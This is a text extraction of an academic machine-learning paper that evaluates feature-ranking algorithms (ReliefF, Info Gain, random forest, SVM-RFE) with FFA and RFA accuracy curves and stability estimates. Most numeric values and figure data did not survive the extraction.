we construct the curves based on the feature ranking methods described in the experimental setup of "analysis of different learning methods to construct ffa and rfa curves", and the curves that belong to the completely random ranking (i.e., the expected curves), which serve as a baseline. for the actual construction of the curves (once the ranking is obtained), support vector machines were used, as described and justified in the results of "analysis of different learning methods to construct ffa and rfa curves". the curves were constructed via -times stratified -fold cross validation, using different random seeds. the expected error curves for random rankings were produced by generating random rankings for each dataset under consideration. for each random ranking, error curves were produced and the average of the error values was used as the expected error. this was done in a manner similar to the one described in "evaluation by randomising the ground truth ranking". as mentioned in "the evaluation method", building ffa/rfa curves by adding the features one by one to large feature subsets si and s̄i might be too costly when n is big enough. in this set of experiments, we use the following procedure: we add δ(i) features to the subset, where δ(i) is defined as follows: δ(i) = if ≤ i ≤ , δ(i) = if < i ≤ , and δ(i) = n// otherwise, where // denotes integer division.

results
in this section, we show representative examples of three types of curves: ffa, rfa and stability curves. the curves are shown for two datasets with a lower and two with a higher number of features. the graphs for the other datasets can be found in "appendix " in figs. a –a . we start with the breast-w dataset. the ffa/rfa curves in figs. a and b show that both types of curves are needed in order to evaluate the ranking completely.

table : properties of the benchmark datasets: number of instances (#inst.), number of features (#feat.), number of discrete/numeric attributes (d/n), and number of different class values (#cl.).
dataset #inst. #feat. (d/n) #cl.
aapc ( / )
arrhythmia ( / )
australian ( / )
balance ( / )
breast-cancer ( / )
breast-w ( / )
car , ( / )
chess , ( / )
diabetes ( / )
diversity ( / )
german , ( / )
heart ( / )
heart-c ( / )
heart-h ( / )
hepatitis ( / )
image , ( / )
ionosphere ( / )
iris ( / )
sonar ( / )
tic-tac-toe ( / )
vote ( / )
water ( / )
waveform , ( / )
wine ( / )
----------------------------------------
amlprognosis , ( / , )
bladdercancer , ( / , )
breastcancer , ( / , )
childhoodall , ( / , )
cmltreatment , ( / , )
colon , ( / , )
dlbcl , ( / , )
leukemia , ( / , )
mll , ( / , )
prostate , ( / , )
srbct , ( / , )
note: the datasets with a considerably high number of features are listed under the dashed line.

the ffa-curves suggest that all feature ranking algorithms (except for the random ranking) place only the relevant features at the beginning, since there is practically no difference if we compare the accuracy of the -feature (all) model and, for example, the -feature model. however, the rfa-curves show that all feature ranking algorithms, except for info gain, misplace some relevant features, since the info-gain-ranking-based models have by far the lowest accuracy in the rfa curves. also, in the case of info gain, the accuracy ceases to decrease after only cca. top-ranked features were removed. figure c shows that info gain also produces the most stable rankings. we can see that the top-ranked feature is always the same, since the stability index of info gain equals at the point k = . the second most stable algorithm is relieff, the third is random forest and the least stable is svm-rfe, but the difference between random forest and svm-rfe is not considerable.

figure : ranking quality assessment for datasets breast-w (a–c) and water (d–f) in terms of the ffa (a and d) and rfa curves (b and e), and rankings' stability estimates (c and f). the ffa/rfa curves are obtained by using svms.

let us now take a look at the curves for the dataset water. from the ffa-curves in fig. d, we see that relieff, info gain and random forest ought to have the same top-ranked features and, as a consequence, the same last = − features too. however, the first features are ordered better by info gain and relieff, while the last are ordered more properly by random forest. we can conclude that none of the rankings is ideal, but we can come close to the ideal one (in terms of ffa-curves) if we combine the first part of the relieff (or info gain) ranking and the second part of the random forest ranking. this claim is also confirmed by the rfa-curves of info gain and relieff (fig. e): these two algorithms indeed misplace some relevant features, since the accuracy of the model abruptly decreases at the end of the ranking. figure f suggests that we should prefer info gain and relieff over random forest since they are more stable. however, we can also notice that random forest is the least stable at the beginning of the ranking, but its stability increases when the number of features gets larger.

figure : ranking quality assessment for datasets mll (a–c) and amlprognosis (d–f) in terms of the ffa (a and d) and rfa curves (b and e), and rankings' stability estimates (c and f). the ffa/rfa curves are obtained by using svms. slavkov et al. ( ), peerj comput. sci., doi .
we begin the analysis of the high-dimensional datasets with mll. figure b shows that random forest completely misplaces some relevant features, since its rfa-curve mostly goes above the random-ranking one. even though it is evident from random forest's ffa-curves that some relevant features are also successfully captured, random forest produces the worst ranking. info gain is slightly better, whereas relieff and svm-rfe are again the best algorithms. from the ffa-curves, we can conclude that svm-rfe places more features with higher relevance at the beginning of the ranking (its curve is higher than relieff's), while the rfa-curves reveal that svm-rfe also misses some quite relevant features: relieff's curve is far below svm-rfe's. figure c shows that relieff is considerably more stable than svm-rfe, hence we prefer the former over the latter on the mll dataset.

the last example shows that sometimes the interpretation of the results is not that easy. in figs. d and e, the ffa and rfa curves for the amlprognosis dataset are presented. in this case, only info gain performs considerably better than random ranking in terms of ffa-curves. svm-rfe is also able to find some relevant features at the beginning (the peak of its curve), but after that the models' accuracy decreases, hence mostly noisy features are positioned there. some relevant features are again placed by relieff, info gain and random forest around the same place further down the ranking (the local peak of their curves in the right part of the ffa-curve). the rfa-curves confirm that there is indeed much noise in these data, since removing features does not result in an (at least approximately) decreasing curve. it may not come as a surprise that all ranking algorithms produce rankings that are very unstable at the beginning (fig. f), but it is interesting that, after a sufficiently large number of features, info gain and random forest produce quite stable rankings even though they have low quality. the reason for both the low quality of the rankings and their instability is probably the low number of instances accompanied by a high number of features.

conclusions

we have proposed a method for evaluating and comparing feature rankings. the method is based on constructing two chains of predictive models that are built on two families of nested subsets of features. the first family of subsets are the sets of top-ranked features, while the second family consists of sets of bottom-ranked features. the predictive performances of the models form an ffa curve in the former case and an rfa curve in the latter case. we show in our experiments that both types of curves are necessary when comparing rankings: ffa curves detect whether important features are placed at the beginning of the ranking, whereas rfa curves detect whether important features can still be found at the end of the ranking.
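to make the construction of the two chains concrete, the following minimal sketch builds the ffa and rfa points for a single feature ranking. the choice of scikit-learn's svc with default parameters, accuracy scoring, ten-fold cross-validation, the helper name ffa_rfa_curves and the convention that the rfa point at size k uses all features below position k are our illustrative assumptions, not the authors' exact implementation.

```python
# illustrative sketch only: ffa/rfa points for one feature ranking.
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score

def ffa_rfa_curves(X, y, ranking, subset_sizes):
    """ranking: feature indices ordered from most to least relevant.
    subset_sizes: the k values (1 <= k < n) at which the curves are evaluated."""
    ffa, rfa = [], []
    for k in subset_sizes:
        top = ranking[:k]        # the k best-ranked features (ffa point)
        bottom = ranking[k:]     # the remaining bottom-ranked features (rfa point)
        ffa.append(cross_val_score(SVC(), X[:, top], y, cv=10).mean())
        rfa.append(cross_val_score(SVC(), X[:, bottom], y, cv=10).mean())
    return np.array(ffa), np.array(rfa)
```

each point requires fitting and evaluating a separate model, which is why the curves become expensive to compute at full resolution; evaluating only a subsample of subset sizes, or distributing the loop over workers, keeps the cost manageable.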
in the first set of experiments, we show the usefulness of the proposed evaluation method and its sensitivity to rankings of different quality on synthetic data. the second set of experiments shows which of the learning methods are appropriate for building the ffa and rfa curves (svms, k-nn) and which are not (naïve bayes, decision tree, random forest). in the third set of experiments on synthetic data, we test several feature ranking algorithms and examine their properties. considering data with different properties, we show that the relieff algorithm outperforms the other investigated approaches, both in terms of detecting relevant features and in terms of the stability of the feature rankings it produces. moreover, we show the usefulness of the proposed approach in real-world scenarios. we evaluate feature rankings computed by four feature ranking algorithms on classification benchmark problems. the results reveal that there is no feature ranking algorithm that would dominate the others on every dataset.

a possible disadvantage of the proposed method is that it can be computationally quite intensive if we want to construct the curves in full resolution. namely, every point of an ffa or rfa curve comes at the cost of building and evaluating a predictive model. however, as justified in the method description, the full resolution is not necessary, especially when the number of features is really high, and, moreover, the construction of the curve can also be easily parallelized.

the work presented in this article can continue in many directions. first of all, the proposed methodology could use other error measures, since accuracy is appropriate only for the task of classification when the distribution of the target variable is approximately uniform. the strong modularity of the ffa/rfa curves allows for their use in any other predictive modeling task; for example, for the task of regression, we could use root mean squared error instead of accuracy. however, even though there exists a regression version of most of the learners considered for constructing the curves, the experiments should be repeated for those cases, since the conclusions about, for example, the most appropriate learner for constructing the curves can be different. moreover, the method can be adapted not only to the regression setting, but also to different tasks of structured output prediction (bakr et al.) and time series prediction.

appendix

in this section, we explain how we generate our synthetic datasets. for simplicity, we take both the features fi and the target ft to be binary, taking values from the set {0, 1}. we then partition the set of features f into feature interaction subsets fint of cardinality one and two. the feature sets with cardinality one are single features fi that are in an individual interaction with the target ft, while the features from the interaction sets with cardinality two determine the value of the target by the xor relation. the examples are generated as follows. for each example, we first randomly (from a uniform distribution) set the value of the target feature ft. after that, if fint = {fi}, then the value of feature fi is randomly chosen so that p(fi = ft) = p. otherwise, we have fint = {fi, fj}, and the values of the features fi and fj are randomly chosen so that p(xor(fi, fj) = ft) = p. we consider four different values of p. the feature sets with p = 0.5 are in fact independent of the target ft and can be considered as irrelevant features.
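the procedure above translates fairly directly into code. the sketch below, written against numpy, is our illustrative reading of it: the helper name generate_examples, the interaction layout and the concrete probability values and dataset size in the example call are placeholders, since the exact values used in the paper are not reproduced in this excerpt.

```python
# illustrative reading of the synthetic-data generation procedure above.
import numpy as np

rng = np.random.default_rng(0)

def generate_examples(n_examples, interactions):
    """interactions: list of (cardinality, p) pairs. cardinality 1 yields a
    single feature f_i with P(f_i = f_t) = p; cardinality 2 yields a pair
    (f_i, f_j) with P(xor(f_i, f_j) = f_t) = p."""
    f_t = rng.integers(0, 2, size=n_examples)       # uniform binary target
    columns = []
    for cardinality, p in interactions:
        agree = rng.random(n_examples) < p          # does the group match f_t?
        group_value = np.where(agree, f_t, 1 - f_t)
        if cardinality == 1:
            columns.append(group_value)
        else:                                       # xor-related pair
            f_i = rng.integers(0, 2, size=n_examples)
            f_j = np.bitwise_xor(group_value, f_i)
            columns.extend([f_i, f_j])
    return np.column_stack(columns), f_t

# example call with made-up p values: two individually relevant features,
# one xor pair and three irrelevant (p = 0.5) features
X, y = generate_examples(1000, [(1, 0.9), (1, 0.9), (2, 0.9),
                                (1, 0.5), (1, 0.5), (1, 0.5)])
```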
with combinations of these feature interaction sets, three datasets were generated, each of them with the same number of instances and the same total number of features. the first dataset (named single) comprises only individually correlated features. the second dataset (named pair) contains relevant features related to the target via the xor relation, as well as irrelevant features. the third (named combined) is a combination of the first two: it contains xor-related features and individually correlated features. in order to simulate the redundancy of features that occurs in real datasets, the three datasets are constructed in the following way: if the set fint of relevant features is included in the dataset, we also include two redundant copies of fint in the dataset. irrelevant features are realized independently of each other. the properties of the generated datasets are summarized in the table below, from which we can read off how many relevant features there are in the single, pair and combined datasets.

table: properties of the synthetic datasets (columns: fint, p, #copies in single, #copies in pair, #copies in combined; the numeric entries are not preserved in this extraction). note: if p > 0.5, #copies denotes the number of copies of the interaction set; in the last row, where p = 0.5, #copies corresponds to the number of independently realized irrelevant features.

the ground-truth feature relevances rel(fi) of the features fi are defined as follows. first, the relevance of each feature group fint is defined as the mutual information between the group and ft, namely rel(F_int) = I(F_int; f_t). second, for fi ∈ fint, the feature importances are obtained as

rel(f_i) = rel(F_int) / |F_int|.

for the particular three datasets, this ground-truth ranking rgt should also result in the optimal ffa and rfa curves, but this may not be the case in general. in the next section, we give the results of comparing it to the other feature rankings.

appendix

when discussing the results in "evaluation by randomising the ground truth ranking", we showed that, when the level of noise θ in the ranking increases, (i) the quality of the ranking rθ decreases, and (ii) the rankings rgt and rθ become more and more distant. however, for the second point, we need to define a distance dist(rgt, rθ) between a noisy and the ground truth ranking. in the definition of dist(rgt, rθ) we use the average spearman rank correlation coefficient ρ(r_a, r_b), which is calculated as

\rho(r_a, r_b) = \frac{\sum_{i=1}^{n} (rank_a(f_i) - \overline{rank}_a)(rank_b(f_i) - \overline{rank}_b)}{(n - 1)\, \sigma_a \sigma_b},

where n is the number of features; therefore, the average ranks \overline{rank}_a and \overline{rank}_b equal (n + 1)/2. the standard deviations σ_a and σ_b are computed as

\sigma_{a,b} = \sqrt{\sum_{i=1}^{n} (rank_{a,b}(f_i) - \overline{rank}_{a,b})^2 / (n - 1)}.

for a given θ, the distance between the rankings rgt and rθ is then computed as

dist(r_{gt}, r_\theta) = 1 - \frac{1}{m} \sum_{t=1}^{m} \rho(r_{gt}, r_{\theta,t}),

where m is the number of different realizations r_{θ,t} of the noisy ranking rθ. the table given in the next section lists the values of the distances between the ground truth ranking rgt and its noisy versions rθ; note that, for all three synthetic datasets, the distances indeed increase when the amount of noise θ increases.
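the distance defined above is straightforward to compute. the short sketch below uses scipy's spearmanr for the correlation coefficient; the function and variable names are our own and the surrounding setup (how the noisy realizations are produced) is assumed rather than taken from the paper.

```python
# sketch: distance between the ground-truth ranking and noisy rankings,
# computed as one minus the average spearman rank correlation.
import numpy as np
from scipy.stats import spearmanr

def ranking_distance(ranks_gt, noisy_rankings):
    """ranks_gt: array with the ground-truth rank of every feature.
    noisy_rankings: list of arrays with the ranks of the same features in
    each noisy realization r_theta_t."""
    rhos = [spearmanr(ranks_gt, r)[0] for r in noisy_rankings]
    return 1.0 - float(np.mean(rhos))
```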
appendix

in "evaluation by randomising the ground truth ranking", we analyzed rankings of different quality (with different amounts of noise) by comparing them to the ground truth ranking. in a real-world setting, the ground truth ranking is unknown and the feature rankings are induced directly from data. therefore, in this section we analyze the feature rankings produced by the four feature ranking methods from "analysis of different learning methods to construct ffa and rfa curves" on the synthetic data described in "generating synthetic data". when comparing the rankings, stability should also be taken into account, as discussed earlier. therefore, the stability indicator is also included in the analysis.

experimental setup

we used the same parameter settings for the feature ranking algorithms as in "analysis of different learning methods to construct ffa and rfa curves". as noted and justified in the corresponding "results", svms were used for constructing the ffa/rfa curves. the curves were constructed via repeated stratified cross-validation, using different random seeds. to complement them, we also estimate the stability of each feature ranking algorithm by using the stability indicator described in "stability of feature ranking". all feature ranking methods were tested only on the combined dataset.

table: the distances dist(rgt, rθ) for different θ values, for each of the three synthetic datasets single, pair and combined (numeric entries not preserved in this extraction).

results

for our analysis, we consider three types of graphs. the first two types are the ffa curves (fig. a, panel a) and the rfa curves (fig. a, panel b). the third is the stability estimate graph (fig. a, panel c), where the y-axis refers to the value of the stability indicator: the higher the value, the less stable the ranking method. each point k on the x-axis represents the size of the considered feature subsets, consisting of the top-ranked k features.

figure a: ranking quality assessment for dataset combined in terms of the ffa (a) and rfa curves (b), and rankings' stability estimates (c). the ffa/rfa curves are obtained by using svms.

upon a visual inspection of the overall results, we can conclude that all of the feature ranking methods can correctly detect the features individually related to the target. however, info gain and svm-rfe (figs. c and d, respectively) exhibit random behavior for the xor features, that is, they are unable to assign proper relevance values to them. random forests (fig. b) separate relevant from irrelevant features, but the ordering of the relevant features is mixed. finally, relieff (fig. a) provides the ranking that is the closest to the ground truth.

these differences in behavior among the different ranking methods are also clearly reflected in the ffa and rfa curves in fig. a (panels a and b). in panel b, the rfa curves for info gain and svm-rfe behave similarly: namely, a linearly increasing accuracy (from right to left) in the region where the relevant features are randomly distributed, and a sharp increase in accuracy in the region where the individually relevant features are included. on the other hand, the rfa curves of both random forests and relieff first remain constant and then increase abruptly when the top-ranked features are included. these two groups of methods can also be distinguished from the ffa curves. the ffa curves of all methods first increase abruptly and then slightly decrease, but the ffa curves of relieff and random forests increase over more steps and reach higher accuracy than those of info gain and svm-rfe.
this clearly indicates that, while info gain and svm-rfe manage to identify a proportion of the relevant features and put them at the top of the ranking, this proportion is nevertheless smaller than the one identified by random forests and relieff.

the forward feature addition (ffa) and rfa curves undoubtedly allow us to compare the quality of the different ranking algorithms. the ffa/rfa curves of all methods are clearly better than the curves of the random ranking. the relieff ranking algorithm, however, clearly outperforms the other methods: it has the best error curves, that is, the curves that are the closest to those of the ground truth ranking. the second best method is random forests: they exhibit very similar performance, but show a slightly worse ffa curve. both info gain and svm-rfe are clearly inferior in terms of both ffa and rfa curves.

stability-wise, as seen in fig. a (panel c), all of the algorithms are stable in the region of the relevant features that they can detect, except for random forests, which have an instability peak exactly in this region. this means that random forests are in this case capable of detecting all the relevant features, but are highly unstable in the estimation of their ordering. further inspection reveals that relieff generates not only the best rankings in terms of ffa/rfa curves, but also the most stable ones.
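the stability indicator itself is defined elsewhere in the paper; judging only from the axes of the stability plots, which are labelled "normalized canberra distance", it is based on a canberra distance between rankings. the sketch below is therefore a hedged approximation of such an estimate, not the paper's exact formula: it averages the canberra distance between the rank vectors produced in repeated runs and normalizes it by the expected distance between random rankings, with function names and the normalization baseline chosen by us.

```python
# hedged sketch of a canberra-based stability estimate for a ranking method.
import numpy as np
from itertools import combinations

def canberra(ranks_a, ranks_b):
    # ranks are 1-based, so the denominator is always positive
    return np.sum(np.abs(ranks_a - ranks_b) / (ranks_a + ranks_b))

def stability_estimate(rank_vectors, n_random=200, seed=0):
    """rank_vectors: list of 1-based rank arrays, one per repeated run.
    lower output means a more stable ranking method."""
    rng = np.random.default_rng(seed)
    observed = np.mean([canberra(a, b)
                        for a, b in combinations(rank_vectors, 2)])
    n = len(rank_vectors[0])
    baseline = np.mean([canberra(rng.permutation(n) + 1,
                                 rng.permutation(n) + 1)
                        for _ in range(n_random)])
    return observed / baseline
```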
appendix

in this section, we provide detailed per-dataset results from the experimental study.

figure a: ranking quality assessment for datasets aapc (a, c and e) and arrhythmia (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.
figure a: ranking quality assessment for datasets australian (a, c and e) and balance (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.

figure a: ranking quality assessment for datasets breast-cancer (a, c and e) and car (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.
figure a: ranking quality assessment for datasets chess (a, c and e) and diabetes (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.

figure a: ranking quality assessment for datasets diversity (a, c and e) and german (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.
full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets heart-c (a, c and e) and heart-h (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets heart (a, c and e) and hepatitis (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . 
figure a: ranking quality assessment for datasets image (a, c and e) and ionosphere (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.

figure a: ranking quality assessment for datasets iris (a, c and e) and sonar (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.
figure a: ranking quality assessment for datasets tic-tac-toe (a, c and e) and vote (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.

figure a: ranking quality assessment for datasets waveform (a, c and e) and wine (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings' stability estimates (e and f). the ffa/rfa curves are obtained by using svms.
additional information and declarations

funding
this work was supported by the ad futura slovene human resources development and scholarship fund, the slovenian research agency (through the grants j - and n - and a young researcher grant), and the european commission through the grants tailor (h -ict- ) and ai eu (h -ict- ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
the ad futura slovene human resources development and scholarship fund, slovenian research agency: j - and n - .
tailor (h -ict- ) and ai eu (h -ict- ).

competing interests
the authors declare that they have no competing interests.

author contributions
- ivica slavkov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- matej petković performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- pierre geurts conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- dragi kocev conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- sašo džeroski conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability:
the code for constructing the curves is available at github: https://github.com/petkomat/fr-eval-curves.
the code for constructing the feature rankings and predictive models used the methods (feature ranking and predictive modeling) implemented in weka: https://www.cs.waikato.ac.nz/~ml/weka/.
the following datasets are available from the uci repository (https://archive.ics.uci.edu/ml/datasets.php): credit approval, arrhythmia, balance scale, breast cancer wisconsin (original), breast cancer, car evaluation, chess (king-rook vs. king-pawn),
statlog (german credit data), statlog (heart), heart disease (cleveland and hungarian data), hepatitis, image segmentation, ionosphere, iris, connectionist bench (sonar, mines vs. rocks), tic-tac-toe endgame, congressional voting records, waveform database generator, wine.
the pima indians diabetes data (previously available at the uci repository) is now available at openml: https://www.openml.org/d/.
the following datasets are available from the bioinformatics laboratory (https://file.biolab.si/biolab/supp/bi-cancer/projections/index.html): aml prognosis, bladder cancer, breast cancer, childhood all, cml treatment, breast & colon (colon part of the data set), dlbcl, leukemia, mll, prostate, srbct.
three additional datasets (aapc, diversity, water) are available at gitlab: http://source.ijs.si/data/classification-data.

references

aha d, kibler d. instance-based learning algorithms. machine learning.
arceo-vilas a, fernandez-lozano c, pita s, pértega-díaz s, pazos a. a redundancy-removing feature selection algorithm for nominal data. peerj computer science.
bakr gh, hofmann t, schölkopf b, smola aj, taskar b, vishwanathan sv. predicting structured data. cambridge: the mit press.
biesiada j, duch w, kachel a, paucha s. feature ranking methods based on information entropy with parzen windows. in: international conference on research in electrotechnology and applied informatics, katowice, poland.
boucheham a, batouche m. robust biomarker discovery for cancer diagnosis based on meta-ensemble feature selection. in: science and information conference.
breiman l. random forests. machine learning.
cortes c, vapnik v. support-vector networks. machine learning.
duch w, wieczorek t, biesiada j. comparison of feature ranking methods based on information entropy. in: ieee international conference on neural networks. piscataway: ieee.
džeroski s, demšar d, grbović j. predicting chemical parameters of river water quality from bioindicator data. applied intelligence.
džeroski s, potamias g, moustakis v, charissis g. automated revision of expert rules for treating acute abdominal pain in children. in: artificial intelligence in medicine (aime), lncs.
furlanello c, serafini m, merler s, jurman g. entropy-based gene ranking without selection bias for the predictive classification of microarray data. bmc bioinformatics.
guyon i, weston j, barnhill s, vapnik v. gene selection for cancer classification using support vector machines. machine learning.
guzmán-martínez r, alaiz-rodríguez r. feature selection stability assessment based on the jensen-shannon divergence. lecture notes in computer science.
henzgen s, hüllermeier e. weighted rank correlation: a flexible approach based on fuzzy order relations. in: appice a, rodrigues pp, santos costa v, gama j, jorge a, soares c, eds. machine learning and knowledge discovery in databases. berlin: springer international publishing.
john gh, langley p. estimating continuous distributions in bayesian classifiers. in: proceedings of the eleventh conference on uncertainty in artificial intelligence. burlington: morgan kaufmann.
jong k, mary j, cornuéjols a, marchiori e, sebag m. ensemble feature ranking. in: pkdd, lncs.
jurman g, merler s, barla a, paoli s, galea a, furlanello c. algebraic stability indicators for ranked lists in molecular profiling. bioinformatics.
kalousis a, prados j, hilario m. stability of feature selection algorithms: a study on high-dimensional spaces. knowledge and information systems.
khoshgoftaar tm, fazelpour a, wang h, wald r. a survey of stability analysis of feature subset selection techniques. in: ieee international conference on information reuse and integration (iri). piscataway: ieee.
lance gn, williams wt. computer programs for hierarchical polythetic classification ('similarity analyses'). computer journal.
lance gn, williams wt. mixed-data classificatory programs i: agglomerative systems. australian computer journal.
li z, gu w. a redundancy-removing feature selection algorithm for nominal data. peerj computer science.
liang j, yang s, winstanley a. invariant optimal feature selection: a distance discriminant and feature ranking based solution. pattern recognition.
liu t, liu s, chen z, ma w-y. an evaluation on feature selection for text clustering. in: fawcett t, mishra n, eds. icml. menlo park: the aaai press.
mramor m, leban g, demšar j, zupan b. visualization-based cancer microarray data classification analysis. bioinformatics.
muja m, lowe dg. fast approximate nearest neighbors with automatic algorithm configuration. in: ranchordas a, araújo h, eds. visapp. porto: insticc press.
nardone d, ciaramella a, staiano a. a redundancy-removing feature selection algorithm for nominal data. peerj computer science.
newman cbd, merz c. uci repository of machine learning databases. available at http://archive.ics.uci.edu/ml/index.php.
nilsson r, peña jm, björkegren j, tegnér j. consistent feature selection for pattern recognition in polynomial time. journal of machine learning research.
nogueira s, sechidis k, brown g. on the stability of feature selection algorithms. journal of machine learning research.
paoli s, jurman g, albanese d, merler s, furlanello c. semisupervised profiling of gene expressions and clinical data. in: proceedings of the sixth international conference on fuzzy logic and applications.
quinlan r. c4.5: programs for machine learning. san mateo: morgan kaufmann publishers.
robnik-šikonja m, kononenko i. theoretical and empirical analysis of relieff and rrelieff. machine learning.
saeys y, abeel t, de peer yv. robust feature selection using ensemble feature selection techniques. in: daelemans w, goethals b, morik k, eds. machine learning and knowledge discovery in databases, ecml pkdd, lecture notes in computer science. berlin: springer.
slavkov i, petković m, kocev d, džeroski s. quantitative score for assessing the quality of feature rankings. informatica.
tsang iw, kwok jt, cheung p-m. core vector machines: fast svm training on very large data sets. journal of machine learning research.
verikas a, gelzinis a, bacauskiene m. mining data with random forests: a survey and results of new tests. pattern recognition.
wang y, jha s, chaudhuri k. analyzing the robustness of nearest neighbors to adversarial examples. in: proceedings of the international conference on machine learning (icml), pmlr, stockholm, sweden.
xu h, caramanis c, mannor s. robustness and regularization of support vector machines. journal of machine learning research.
hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients

a peer-reviewed version of this preprint was published in peerj.
